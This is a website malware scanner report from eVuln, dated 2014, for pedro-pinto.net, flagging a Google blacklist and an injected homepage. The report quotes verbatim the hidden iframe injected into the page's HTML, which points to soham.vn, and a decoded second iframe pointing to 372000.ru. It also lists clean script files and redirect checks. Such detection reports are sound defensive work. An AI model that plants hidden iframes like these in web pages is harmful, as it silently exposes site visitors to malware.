New scan:

Malware Scanner report for pedro-pinto.net

Malicious/Suspicious/Total urls checked
1/0/10
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "pedro-pinto.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/1
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pedro-pinto.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://pedro-pinto.net/
200 OK
Content-Length: 12778
Content-Type: text/html
malicious
Page code contains blacklisted domain: soham.vn

...[15740 bytes skipped]...
gt;Contact</a></li>
</ul>
</div><!-- end navright -->
</div><!-- end content -->
<div id="footer">
<div id="footer-text">
Copyright &copy; 2011 Pedro Pinto. Todos os direitos reservados.
</div>
</div><!-- end footer -->
</div><!-- end container -->
</body>
</html><iframe src="http://soham.vn/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Decoded script:


<iframe style="height:1px" src="http://372000.ru/images/intro.html" frameborder=0 width=1></iframe>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://soham.vn/counter.php
This URL is marked by Google as suspicious

<iframe src="http://soham.vn/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://pedro-pinto.net/js/jquery-1.4.2.min.js
200 OK
Content-Length: 72173
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/cufon-yui.js
200 OK
Content-Length: 18233
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/Rockwell_400-Rockwell_700-Rockwell_italic_400.font.js
200 OK
Content-Length: 147960
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/jquery.cycle.all.min.js
200 OK
Content-Length: 23729
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/twitter.js
200 OK
Content-Length: 1405
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/slimbox2.js
200 OK
Content-Length: 4202
Content-Type: application/javascript
clean
http://pedro-pinto.net/js/contact.js
200 OK
Content-Length: 1248
Content-Type: application/javascript
clean
http://pedro-pinto.net/mailito:ppedrospinto@gmail.com
500 Internal Server Error
Content-Length: 686
Content-Type: text/html
clean
http://pedro-pinto.net/test404page.js
500 Internal Server Error
Content-Length: 686
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pedro-pinto.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 20:45:01 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 12778
Content-Type: text/html
Last-Modified: Thu, 15 Mar 2012 09:32:17 GMT

...12778 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pedro-pinto.net
Referer: http://www.google.com/search?q=pedro-pinto.net

Result:
The result is similar to the first query. There are no suspicious redirects found.